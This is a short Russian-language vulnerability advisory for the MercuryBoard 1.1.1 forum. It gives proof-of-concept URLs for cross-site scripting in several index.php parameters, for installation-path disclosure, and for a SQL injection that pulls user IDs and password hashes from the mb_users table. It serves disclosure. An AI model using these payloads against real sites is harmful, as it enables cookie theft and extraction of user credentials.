• Партнер

  • Программа: MercuryBoard 1.1.1

    Уязвимость в MercuryBoard позволяет удаленному
    пользователю произвести XSS нападение,
    выполнить SQL-инъекцию и получить информацию
    об установочной директории приложения на
    сервере. Уязвимость сущетвуте из-за
    недостаточной проверки данных в параметре
    ‘s’ сценария 'func/pm.php'. Удаленный
    пользователь может с помощью специально
    сформированного URL выполнить произвольный
    HTML сценарий в браузере целевого
    пользователя.

    Пример:

    http://[target]/index.php?a=pm&s= '><script>alert(document.cookie)</script>

    Недостаточная обработка данных в
    параметре ‘i’ сценария 'func/members.php'
    позволяте удаленному пользователю
    произвести XSS нападение.

    Пример:

    http://[target]/index.php?a=members&l= '><script>alert(document.cookie)</script>

    Также уязвимы другие параметры:

    http://[target]/index.php?a='><script>alert(document. cookie)</script
    >
    http://[target]/index.php?a=post&s='><script> alert(document.cookie)</script>
    http://[target]/index.php?a=post&s=reply&t='> <script>alert(document.cookie)</script>
    htt p://[target]/index.php?a=pm&s=send&to='> <script>alert(document.cookie)</script>
    http://[target]/index.php?a=pm&s=send&to=2 &re='><script>alert(document.cookie)</script>
    http://[target]/index.php?a=cp&s='><script> alert(document.cookie)</script>

    Удаленный пользователь может получить
    информацию об установочной директории на
    сервере из-за уязвимости в сценарии 'global.php'.

    Пример:

    http://[target]/index.php?a=forum&f=2&min=0&n=0

    Также уязвимы сценарии:

    lib/jpgraph/jpgraph_bar.php
    lib/jpgraph/jpgraph_log.php
    lib/jpgraph/jpgraph_polar.php
    admincp/admin.php

    и все сценарии в директории func.

    Удаленный авторизованный пользователь
    может выполнить произвольные SQL команды на
    системе.

    Пример:

    http://[target]/index.php?a=post&s=reply &t=0%20UNION%20SELECT%20user_id,
    %20user_password%20FROM%20mb_users%20/*

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии